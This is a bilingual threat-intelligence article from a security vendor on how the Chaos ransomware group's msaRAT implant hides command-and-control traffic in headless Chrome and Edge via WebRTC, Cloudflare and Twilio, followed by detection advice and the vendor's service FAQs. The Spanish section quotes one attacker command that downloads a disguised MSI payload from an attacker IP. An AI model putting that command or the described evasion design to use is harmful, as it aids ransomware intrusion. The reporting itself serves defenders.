Chaos utiliza msaRAT para ocultar su C2 a través de Chrome y Edge, dificultando su detección

XPoint
Publicado el 23/07/2026

Un nuevo enfoque para ocultar el comando y control

Investigadores de Cisco Talos revelaron una nueva táctica empleada por el grupo de ransomware Chaos, que utiliza un implante desarrollado en Rust, denominado msaRAT, para ocultar completamente las comunicaciones de comando y control (C2) utilizando los navegadores Google Chrome y Microsoft Edge.

A diferencia del malware tradicional, msaRAT no establece conexiones salientes propias. En su lugar, utiliza el navegador instalado en el equipo comprometido para transportar todo el tráfico malicioso, haciendo que las comunicaciones parezcan completamente legítimas ante las herramientas de seguridad.

Este enfoque representa una evolución significativa en las técnicas de evasión utilizadas por operadores de ransomware, ya que aprovecha servicios ampliamente confiables como Cloudflare Workers, Twilio TURN y WebRTC para camuflar sus comunicaciones.


Cómo funciona el ataque

Tras obtener acceso inicial al equipo —habitualmente mediante campañas de spam, vishing, Quick Assist o herramientas legítimas de administración remota (RMM)— los atacantes descargan un instalador MSI disfrazado como una actualización de Windows.

El malware se instala mediante un sencillo comando:

curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:\ProgramData\update_ms.msi

Aunque utiliza el puerto 443, la descarga se realiza mediante HTTP, una técnica que puede evadir controles de firewall configurados únicamente por número de puerto y no por inspección del protocolo.

Durante la instalación, el MSI ejecuta una DLL en memoria que corresponde a msaRAT, iniciando así la fase de acceso remoto antes del despliegue del ransomware.


Chrome y Edge realizan toda la comunicación

Uno de los aspectos más innovadores del malware es que nunca se comunica directamente con el servidor del atacante.

En cambio:

  • Inicia Chrome o Edge en modo headless.
  • Activa el Chrome DevTools Protocol (CDP).
  • Controla el navegador mediante WebSockets.
  • Utiliza WebRTC Data Channels para transmitir toda la información.

Como resultado, el tráfico observado por los sistemas de monitoreo parece corresponder únicamente a un navegador comunicándose con servicios legítimos de Cloudflare y Twilio.

La dirección IP real del servidor de comando y control nunca aparece durante la comunicación.


Comunicación cifrada y altamente resiliente

El canal de comunicación utiliza una arquitectura de doble cifrado:

  • DTLS, proporcionado por WebRTC.
  • ChaCha20-Poly1305, implementado por el propio malware mediante un intercambio de claves ECDH.

Esta doble capa de protección dificulta considerablemente la inspección del contenido incluso cuando el tráfico es interceptado.


Infraestructura basada en servicios legítimos

Para establecer la conexión inicial, msaRAT obtiene la configuración STUN y TURN desde un Cloudflare Worker, utilizando encabezados HTTP que simulan provenir de sitios oficiales de Microsoft.

Posteriormente, toda la comunicación se enruta mediante la infraestructura TURN de Twilio, ampliamente utilizada por aplicaciones legítimas de videoconferencia.

Una vez establecida la sesión WebRTC, Cloudflare deja de participar y todo el tráfico continúa circulando exclusivamente a través de los servidores TURN de Twilio.

Este diseño hace extremadamente difícil bloquear la comunicación sin afectar servicios empresariales legítimos.


Capacidades del implante msaRAT

Una vez activo, el malware permite a los operadores:

  • Ejecutar comandos del sistema.
  • Mantener acceso remoto persistente.
  • Transferir archivos.
  • Capturar pantallas.
  • Utilizar el equipo como proxy.
  • Ejecutar cargas útiles adicionales.
  • Preparar el entorno para el despliegue del ransomware Chaos.

Cisco Talos considera que la arquitectura está diseñada para transportar archivos grandes de forma confiable, como capturas de pantalla o herramientas adicionales.


No explota vulnerabilidades del navegador

Es importante destacar que msaRAT no aprovecha ninguna vulnerabilidad en Chrome ni Edge.

Los navegadores simplemente son utilizados como herramientas legítimas para ocultar el canal de comunicación.

Por ello, aplicar actualizaciones del navegador no elimina esta técnica de ataque.


Detección basada en comportamiento

Dado que el tráfico parece completamente legítimo, la detección debe centrarse principalmente en el comportamiento de los procesos.

Cisco Talos recomienda buscar:

  • Chrome o Edge ejecutándose en modo headless.
  • Uso del parámetro --remote-debugging-port.
  • Navegadores iniciados por procesos MSI, instaladores o servicios.
  • Tráfico hacia el puerto de depuración local (loopback).
  • Comunicación WebRTC inusual desde servidores Windows.
  • Uso del Chrome DevTools Protocol (CDP) fuera de entornos de automatización.

Estas anomalías constituyen indicadores mucho más estables que las direcciones IP o dominios utilizados por los atacantes, los cuales pueden cambiar rápidamente.


¿Por qué esta técnica es tan preocupante?

Los operadores de ransomware están dejando de depender únicamente de malware sofisticado para comenzar a abusar de herramientas legítimas presentes en prácticamente todos los equipos corporativos.

Al utilizar Chrome, Edge, Cloudflare Workers, Twilio y WebRTC, los atacantes consiguen:

  • Reducir significativamente su visibilidad.
  • Evadir controles tradicionales de red.
  • Dificultar el bloqueo mediante listas negras.
  • Camuflar el tráfico malicioso entre comunicaciones legítimas.
  • Mantener acceso persistente durante más tiempo.

Esta estrategia confirma una tendencia creciente: los atacantes prefieren mezclarse con la actividad normal del sistema antes que desarrollar nuevas técnicas de explotación.


Recomendaciones para las organizaciones

Para reducir el riesgo asociado a esta técnica se recomienda:

  • Monitorear la ejecución inesperada de Chrome y Edge en modo headless.
  • Detectar el uso del parámetro --remote-debugging-port.
  • Restringir el uso de herramientas RMM no autorizadas.
  • Implementar monitoreo del Chrome DevTools Protocol.
  • Inspeccionar conexiones WebRTC inusuales desde servidores.
  • Correlacionar eventos de MSI con la creación de procesos de navegador.
  • Aplicar controles EDR basados en comportamiento y no únicamente en indicadores de compromiso (IoC).

Conclusión

El uso de msaRAT por parte del grupo Chaos demuestra cómo las campañas modernas de ransomware están evolucionando hacia técnicas mucho más discretas y difíciles de detectar.

En lugar de establecer canales de comunicación propios, los atacantes reutilizan componentes confiables del sistema operativo y servicios ampliamente utilizados en Internet para ocultar sus operaciones.

Más que una nueva familia de malware, msaRAT representa un cambio de paradigma: el navegador deja de ser únicamente una herramienta del usuario para convertirse en un canal encubierto de comando y control.


Chaos Uses msaRAT to Hide Command-and-Control Traffic Through Chrome and Edge

A New Stealth Technique for Command and Control

Cisco Talos researchers have uncovered a new technique used by the Chaos ransomware group involving a Rust-based implant called msaRAT.

Instead of establishing its own outbound connections, msaRAT abuses legitimate web browsers—Google Chrome and Microsoft Edge—to route all command-and-control (C2) communications, making malicious traffic appear as normal browser activity.

By leveraging trusted services such as Cloudflare Workers, Twilio TURN, and WebRTC, the malware significantly reduces its visibility to traditional network security tools.


How the Attack Works

After obtaining initial access—typically through spam campaigns, vishing, Quick Assist, or legitimate Remote Monitoring and Management (RMM) tools—the attackers download a fake Windows update MSI package.

The installer executes a Rust DLL entirely in memory, launching msaRAT before the Chaos ransomware payload is deployed.


Chrome and Edge Become the Communication Layer

Rather than communicating directly with attacker-controlled infrastructure, msaRAT:

  • Launches Chrome or Edge in headless mode.
  • Enables the Chrome DevTools Protocol (CDP).
  • Controls the browser through WebSockets.
  • Uses WebRTC Data Channels for encrypted communication.

To defenders, all network traffic appears to originate from a legitimate browser communicating with Cloudflare and Twilio infrastructure.

The actual attacker-controlled C2 server never appears on the network.


Double Encryption for Greater Stealth

Communications are protected by two encryption layers:

  • DTLS provided by WebRTC.
  • ChaCha20-Poly1305 encryption using an ECDH key exchange implemented by the malware itself.

This layered encryption makes deep packet inspection significantly more difficult.


Built on Trusted Cloud Services

Initial signaling is performed through a Cloudflare Worker that masquerades as Microsoft traffic.

Once the WebRTC session is established, communications are relayed entirely through Twilio’s TURN infrastructure, allowing the malware to blend seamlessly with legitimate enterprise traffic.

Blocking these services outright is generally impractical for most organizations because many legitimate collaboration platforms rely on the same infrastructure.


msaRAT Capabilities

The implant provides operators with:

  • Remote command execution.
  • Persistent access.
  • File transfer.
  • Screenshot capture.
  • Proxy functionality.
  • Delivery of additional payloads.
  • Preparation for ransomware deployment.

Talos notes that its transport layer appears optimized for reliably transferring large payloads.


No Browser Vulnerability Required

Importantly, msaRAT does not exploit vulnerabilities in Chrome or Edge.

The browsers are simply abused as trusted communication tools, meaning browser updates alone will not mitigate this technique.


Detection Should Focus on Behavior

Cisco Talos recommends hunting for:

  • Chrome or Edge launched in headless mode.
  • Use of --remote-debugging-port.
  • Browsers started by installers or Windows services.
  • Local loopback traffic to CDP ports.
  • Unusual WebRTC communications from Windows servers.
  • Chrome DevTools Protocol activity outside automation environments.

These behavioral indicators remain far more reliable than IP addresses or domains, which attackers can easily rotate.


Why This Matters

Chaos demonstrates a broader evolution in ransomware operations.

Instead of relying on increasingly sophisticated malware, attackers are abusing legitimate applications and cloud services already trusted inside enterprise environments.

This approach allows them to:

  • Blend into normal traffic.
  • Bypass traditional network controls.
  • Evade signature-based detection.
  • Maintain persistent access.
  • Reduce forensic visibility.

Recommendations

Organizations should:

  • Monitor unexpected headless browser execution.
  • Detect the use of Chrome remote debugging.
  • Restrict unauthorized RMM software.
  • Monitor Chrome DevTools Protocol activity.
  • Inspect abnormal WebRTC communications.
  • Correlate MSI installations with browser launches.
  • Prioritize behavior-based EDR detection over static IoCs.

Conclusion

msaRAT illustrates how modern ransomware operators increasingly rely on trusted software and legitimate cloud infrastructure rather than custom networking components.

By transforming Chrome and Edge into covert communication channels, Chaos significantly raises the bar for defenders and reinforces the need for behavioral detection strategies capable of identifying abuse of legitimate tools rather than simply blocking known malware.

Preguntas frecuentes

¿Qué es y para qué sirve el XyberOne SCM?

+

Tu Cadena de Suministro, Tu Superficie de Ataque.

 Monitorea, mide y gestiona el Ciber-Riesgo de tus proveedores críticos.

XyberOne Supply Chain Monitor (SCM) permite identificar riesgos, filtraciones, vulnerabilidades y amenazas asociadas a terceros desde una única plataforma, entregando el contexto necesario para tomar decisiones antes de que ocurra un incidente. Monitorea y gestiona el Ciber-Riesgo de proveedores críticos mediante inteligencia continua proveniente de Surface Web, Deep y Dark Web.

Obtén visibilidad sobre exposiciones, filtraciones, amenazas activas y riesgos asociados a terceros antes de que impacten a tu organización.

¿Qué es y para qué sirve el XyberOne RCC?

+

Centraliza el CAOS, Controla el RIESGO!

Centraliza vulnerabilidades, amenazas, alertas, activos críticos y controles de cumplimiento para identificar, priorizar y reducir los riesgos que realmente pueden afectar la continuidad de tu negocio.

XyberOne RCC (Risk Command Center) es una plataforma de gestión centralizada del ciber-riesgo que consolida vulnerabilidades, amenazas, alertas, activos críticos y controles de cumplimiento en una única consola.

Su objetivo es entregar una visión integral del riesgo organizacional, transformando información dispersa en inteligencia accionable para priorizar esfuerzos, reducir la exposición y mejorar continuamente la postura de seguridad de la organización.

¿Qué es y para qué sirve el Monitoreo de Dominios?

+

El Monitoreo de Dominios es un servicio de ciberseguridad que vigila en forma continua tus dominios y todo lo que se parezca a ellos para detectar señales tempranas de suplantación, phishing y abuso de marca.

Sirve para:

  • Detectar dominios parecidos (typosquatting, homoglyphs, TLDs distintos) usados para engañar a usuarios.

  • Identificar sitios clonados que imitan tu web, login, pagos o portales (phishing).

  • Monitorear cambios de DNS (MX, SPF, DKIM, DMARC, A/AAAA, NS) que puedan habilitar fraude o desvío de correo.

  • Detectar certificados TLS/SSL emitidos para dominios sospechosos (señal típica de campañas de phishing).

  • Alertar sobre infraestructura maliciosa asociada (IPs, hosting, patrones repetidos) y priorizar por riesgo.

  • Apoyar acciones de takedown y bloqueo (registradores, hosting, listas de denegación, gateways de correo).

En simple: te permite ver y cortar rápido los intentos de suplantación digital antes de que afecten a clientes, pacientes, usuarios o colaboradores, y reduce fraude, pérdida de confianza y riesgo reputacional.

¿Qué es y para qué sirve el Monitoreo Darkweb?

+

El Monitoreo de Dark Web es un servicio de ciberinteligencia que busca y vigila de forma continua en foros clandestinos, marketplaces, sitios de leaks y comunidades cerradas donde se publican, venden o comparten datos robados.

Sirve para:

  • Detectar filtraciones asociadas a tu organización (bases de datos, documentos, correos, PII).

  • Encontrar credenciales comprometidas (usuarios/contraseñas) antes de que se usen en accesos no autorizados.

  • Identificar venta de accesos a sistemas (VPN, RDP, correo, SSO, paneles).

  • Anticipar extorsión/ransomware (menciones, “samples”, anuncios de leak).

  • Proteger marca y clientes: señales de phishing, suplantación, fraude.

  • Entregar alertas y evidencia para investigación y respuesta a incidentes.

En simple: te da visibilidad de lo que pasa fuera de tu perímetro, donde normalmente aparece la información robada antes de que el ataque escale o se haga público.

¿Qué es y para qué sirve el Servicio CTI?

+

El servicio de CTI (Cyber Threat Intelligence) es la capacidad de buscar, analizar y transformar información sobre ciberamenazas en decisiones concretas para reducir riesgo. Sirve para anticiparse: entender quién te puede atacar, cómo lo haría, qué señales dejaría y qué debes reforzar antes de que pase.

  • Para qué sirve CTI (en la práctica)
  • Detectar amenazas relevantes para tu negocio (ransomware, fraude, APT, hacktivismo) y priorizar lo que realmente te afecta.
  • Alertar temprano sobre campañas activas, vulnerabilidades explotadas y señales de ataque dirigidas a tu industria.
  • Monitorear exposición externa: credenciales filtradas, leaks, suplantación de marca, dominios falsos, deep/dark web.
  • Mejorar la defensa: entregar IoCs, TTPs y recomendaciones para SIEM/EDR/SOC (reglas, playbooks, hardening).
  • Apoyar respuesta a incidentes: atribución probable, alcance, riesgos secundarios, y evidencia externa.
  • Reducir fraude y daño reputacional: detectar phishing, impersonación, venta de datos y accesos.

 

¿Qué entrega normalmente?

  • Alertas (críticas en tiempo real) + reportes (semanales/mensuales) con riesgo, impacto y acciones.
  • IoCs (IPs, dominios, URLs, hashes) y TTPs (MITRE ATT&CK) para detección.
  • Recomendaciones accionables priorizadas por criticidad.

En una frase: CTI convierte ruido del mundo criminal en inteligencia accionable para prevenir, detectar y responder mejor.

¿Qué es y para qué sirve un CyberSOC?

+

Un CyberSOC (Cyber Security Operations Center) es un centro especializado que monitorea, detecta y responde a amenazas de ciberseguridad de forma continua (24×7). Su función es proteger los activos digitales de una organización mediante el análisis de eventos, correlación de alertas y gestión estructurada de incidentes.

Sirve para identificar ataques en tiempo real, reducir el impacto de incidentes, cumplir con normativas y fortalecer la postura de seguridad del negocio. En simple: es el equipo y la tecnología que vigilan tu infraestructura digital para que tu operación no se detenga frente a ciberamenazas.

¿Para que sirve el Pentesting?

+

El pentesting o Test de penetración, en español) es una técnica de ciberseguridad que consistente en atacar entornos informáticos con la intención de descubrir vulnerabilidades en los mismos, con el objetivo de reunir la información necesaria para poder prevenir en el futuro ataques externos hacia esos mismos …

¿Qué es y para qué la Seguridad en el Desarrollo Ágil?

+

El Servicio de Seguridad en Ciclo de Desarrollo es un enfoque integral que garantiza la protección de los proyectos de software desde su fase inicial de diseño hasta su implementación final. Esto implica integrar medidas de seguridad en cada etapa del proceso de desarrollo, desde la planificación hasta la entrega del producto. La importancia de este servicio radica en varios aspectos:

  1. Protección temprana contra amenazas: Al abordar la seguridad desde el principio del ciclo de desarrollo, se pueden identificar y mitigar riesgos de seguridad antes de que se conviertan en problemas costosos o críticos en etapas posteriores del proyecto.
  2. Reducción de costos y tiempo: Corregir problemas de seguridad durante las etapas iniciales del desarrollo es más económico y rápido que hacerlo después de que el producto esté en producción. Esto puede ayudar a evitar retrasos en el lanzamiento del producto y ahorros significativos en costos asociados con la corrección de brechas de seguridad.
  3. Cumplimiento normativo: Muchas regulaciones y estándares de la industria requieren que los productos de software cumplan con ciertos requisitos de seguridad y protección de datos. Integrar la seguridad en el ciclo de desarrollo ayuda a garantizar el cumplimiento de estas regulaciones desde el principio, evitando posibles multas y sanciones legales.
  4. Confianza del cliente: La seguridad de los datos y la protección de la privacidad son preocupaciones importantes para los clientes. Al demostrar un compromiso con la seguridad a lo largo de todo el ciclo de desarrollo, las empresas pueden construir y mantener la confianza del cliente en sus productos y servicios.

En resumen, el Servicio de Seguridad en Ciclo de Desarrollo es esencial para garantizar que los productos de software sean seguros, confiables y cumplan con los estándares de seguridad y privacidad, lo que resulta en beneficios tanto para la empresa como para sus clientes.

¿Qué es el Phishing Ético?

+

El Phishing Ético es una servicio que consiste en realizar actividades de Ingeniería Social con propósitos legítimos y éticos, generalmente como parte de una Campaña de Concientización, Evaluación de Seguridad, Prueba de un Pentesting o Red Team.

Para más información ingresa aquí: https://www.xpoint.cl/phishing-etico/

¿Qué es un Red Team en Ciberseguridad?

+

Un Red Team en ciberseguridad es un grupo de profesionales que simulan ser adversarios externos para evaluar la seguridad de un sistema o red. Utilizan tácticas similares a las de ciberdelincuentes reales, llevan a cabo pruebas de penetración, analizan riesgos y proporcionan recomendaciones para mejorar la seguridad. Su enfoque proactivo ayuda a las organizaciones a identificar y abordar vulnerabilidades, fortaleciendo así sus defensas contra amenazas potenciales.

¿Qué es la Gestión de Vulnerabilidades?

+

La gestión de vulnerabilidades es un proceso integral que se centra en identificar, evaluar y abordar las debilidades en la seguridad de un sistema o red. Este proceso sigue varios pasos clave:

  1. Identificación de Vulnerabilidades
  2. Evaluación de Riesgos
  3. Priorización
  4. Mitigación y Solución
  5. Seguimiento Continuo
  6. Comunicación y Documentación
  7. Formación y Concienciación

La gestión de vulnerabilidades es esencial para mantener la seguridad de la información en un entorno digital en constante cambio, minimizando el riesgo de explotación y fortaleciendo las defensas contra posibles amenazas.

¿Tienes dudas?, contáctanos